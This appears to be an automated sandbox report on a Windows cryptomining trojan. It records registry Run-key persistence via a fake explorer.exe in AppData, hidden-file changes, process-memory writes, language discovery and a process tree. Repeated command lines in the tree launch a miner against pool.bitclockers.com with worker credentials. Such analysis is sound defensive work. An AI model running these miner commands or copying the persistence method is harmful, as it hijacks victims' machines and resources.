"C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" explorer.exe -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
Suspicious use of SetWindowsHookEx 64 IoCs
pid Process 4260 JaffaCakes118_c4ad493a6bfd212c4e1418ba605020af.exe 4700 explorer.exe 3748 explorer.exe 4100 explorer.exe 512 explorer.exe 3052 explorer.exe 1412 explorer.exe 100 explorer.exe 1948 explorer.exe 1016 explorer.exe 4204 explorer.exe 1108 explorer.exe 5044 explorer.exe 3408 explorer.exe 3620 explorer.exe 1544 explorer.exe 1828 explorer.exe 1436 explorer.exe 4520 explorer.exe 3192 explorer.exe 3988 explorer.exe 968 explorer.exe 2960 explorer.exe 3864 explorer.exe 1916 explorer.exe 64 explorer.exe 2432 explorer.exe 440 explorer.exe 4144 explorer.exe 4596 explorer.exe 3440 explorer.exe 3960 explorer.exe 1432 explorer.exe 1544 explorer.exe 4992 explorer.exe 4952 explorer.exe 620 explorer.exe 408 explorer.exe 4448 explorer.exe 2416 explorer.exe 768 explorer.exe 3344 explorer.exe 3536 explorer.exe 4992 explorer.exe 1180 explorer.exe 3852 explorer.exe 1288 explorer.exe 2828 explorer.exe 636 explorer.exe 4452 explorer.exe 4048 explorer.exe 2692 explorer.exe 5112 explorer.exe 3680 explorer.exe 2244 explorer.exe 2996 explorer.exe 3408 explorer.exe 1952 explorer.exe 2072 explorer.exe 3812 explorer.exe 4968 explorer.exe 2136 explorer.exe 4932 explorer.exe 440 explorer.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1880 wrote to memory of 4700 1880 cmd.exe 88 PID 1880 wrote to memory of 4700 1880 cmd.exe 88 PID 1880 wrote to memory of 4700 1880 cmd.exe 88 PID 4260 wrote to memory of 1016 4260 JaffaCakes118_c4ad493a6bfd212c4e1418ba605020af.exe 148 PID 4260 wrote to memory of 1016 4260 JaffaCakes118_c4ad493a6bfd212c4e1418ba605020af.exe 148 PID 4260 wrote to memory of 1016 4260 JaffaCakes118_c4ad493a6bfd212c4e1418ba605020af.exe 148 PID 4700 wrote to memory of 3876 4700 explorer.exe 92 PID 4700 wrote to memory of 3876 4700 explorer.exe 92 PID 4700 wrote to memory of 3876 4700 explorer.exe 92 PID 4260 wrote to memory of 2604 4260 JaffaCakes118_c4ad493a6bfd212c4e1418ba605020af.exe 93 PID 4260 wrote to memory of 2604 4260 JaffaCakes118_c4ad493a6bfd212c4e1418ba605020af.exe 93 PID 4260 wrote to memory of 2604 4260 JaffaCakes118_c4ad493a6bfd212c4e1418ba605020af.exe 93 PID 4700 wrote to memory of 2664 4700 explorer.exe 145 PID 4700 wrote to memory of 2664 4700 explorer.exe 145 PID 4700 wrote to memory of 2664 4700 explorer.exe 145 PID 4204 wrote to memory of 3748 4204 cmd.exe 99 PID 4204 wrote to memory of 3748 4204 cmd.exe 99 PID 4204 wrote to memory of 3748 4204 cmd.exe 99 PID 3748 wrote to memory of 3540 3748 explorer.exe 102 PID 3748 wrote to memory of 3540 3748 explorer.exe 102 PID 3748 wrote to memory of 3540 3748 explorer.exe 102 PID 3748 wrote to memory of 4520 3748 explorer.exe 211 PID 3748 wrote to memory of 4520 3748 explorer.exe 211 PID 3748 wrote to memory of 4520 3748 explorer.exe 211 PID 4336 wrote to memory of 4100 4336 cmd.exe 106 PID 4336 wrote to memory of 4100 4336 cmd.exe 106 PID 4336 wrote to memory of 4100 4336 cmd.exe 106 PID 4100 wrote to memory of 4812 4100 explorer.exe 109 PID 4100 wrote to memory of 4812 4100 explorer.exe 109 PID 4100 wrote to memory of 4812 4100 explorer.exe 109 PID 4100 wrote to memory of 2212 4100 explorer.exe 217 PID 4100 wrote to memory of 2212 4100 explorer.exe 217 PID 4100 wrote to memory of 2212 4100 explorer.exe 217 PID 4560 wrote to memory of 512 4560 cmd.exe 289 PID 4560 wrote to memory of 512 4560 cmd.exe 289 PID 4560 wrote to memory of 512 4560 cmd.exe 289 PID 512 wrote to memory of 840 512 explorer.exe 282 PID 512 wrote to memory of 840 512 explorer.exe 282 PID 512 wrote to memory of 840 512 explorer.exe 282 PID 512 wrote to memory of 3780 512 explorer.exe 117 PID 512 wrote to memory of 3780 512 explorer.exe 117 PID 512 wrote to memory of 3780 512 explorer.exe 117 PID 2252 wrote to memory of 3052 2252 cmd.exe 230 PID 2252 wrote to memory of 3052 2252 cmd.exe 230 PID 2252 wrote to memory of 3052 2252 cmd.exe 230 PID 3052 wrote to memory of 2264 3052 explorer.exe 123 PID 3052 wrote to memory of 2264 3052 explorer.exe 123 PID 3052 wrote to memory of 2264 3052 explorer.exe 123 PID 3052 wrote to memory of 3564 3052 explorer.exe 359 PID 3052 wrote to memory of 3564 3052 explorer.exe 359 PID 3052 wrote to memory of 3564 3052 explorer.exe 359 PID 4480 wrote to memory of 1412 4480 cmd.exe 127 PID 4480 wrote to memory of 1412 4480 cmd.exe 127 PID 4480 wrote to memory of 1412 4480 cmd.exe 127 PID 1412 wrote to memory of 3932 1412 explorer.exe 311 PID 1412 wrote to memory of 3932 1412 explorer.exe 311 PID 1412 wrote to memory of 3932 1412 explorer.exe 311 PID 1412 wrote to memory of 4388 1412 explorer.exe 485 PID 1412 wrote to memory of 4388 1412 explorer.exe 485 PID 1412 wrote to memory of 4388 1412 explorer.exe 485 PID 760 wrote to memory of 100 760 cmd.exe 305 PID 760 wrote to memory of 100 760 cmd.exe 305 PID 760 wrote to memory of 100 760 cmd.exe 305 PID 100 wrote to memory of 4044 100 explorer.exe 137
Processes
-
C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_c4ad493a6bfd212c4e1418ba605020af.exe"C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_c4ad493a6bfd212c4e1418ba605020af.exe"1⤵
- Modifies visiblity of hidden/system files in Explorer
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4260 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas2⤵PID:1016
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe2⤵
- System Location Discovery: System Language Discovery
PID:2604
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵
- Suspicious use of WriteProcessMemory
PID:1880 -
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4700 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3876
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2664
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵
- Suspicious use of WriteProcessMemory
PID:4204 -
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3748 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3540
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵
- System Location Discovery: System Language Discovery
PID:4520
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵
- Suspicious use of WriteProcessMemory
PID:4336 -
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4100 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4812
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2212
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵
- Suspicious use of WriteProcessMemory
PID:4560 -
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:512 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:840
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵
- System Location Discovery: System Language Discovery
PID:3780
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵
- Suspicious use of WriteProcessMemory
PID:2252 -
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3052 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵
- System Location Discovery: System Language Discovery
PID:2264
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3564
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵
- Suspicious use of WriteProcessMemory
PID:4480 -
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1412 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3932
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4388
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵
- Suspicious use of WriteProcessMemory
PID:760 -
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:100 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4044
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:1572
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4296
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:1948 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:452
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2664
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:1908
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:1016 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:2768
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3656
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:2024
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:4204 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3192
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2240
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:1648
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:1108 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:1596
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵
- System Location Discovery: System Language Discovery
PID:3988
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:664
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:5044 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3052
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵
- System Location Discovery: System Language Discovery
PID:2828
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3380
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3408 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:1616
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵
- System Location Discovery: System Language Discovery
PID:4680
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:2132
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:3620 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵
- System Location Discovery: System Language Discovery
PID:4388
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3344
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:1800
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:1544 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵
- System Location Discovery: System Language Discovery
PID:628
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:5108
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3208
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1828 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4684
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:5048
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:2136
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:1436 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4956
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵
- System Location Discovery: System Language Discovery
PID:2860
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3852
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:4520 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:2956
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:2212
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵
- System Location Discovery: System Language Discovery
PID:4408
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3444
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:3192 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:1704
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3880
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:224
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
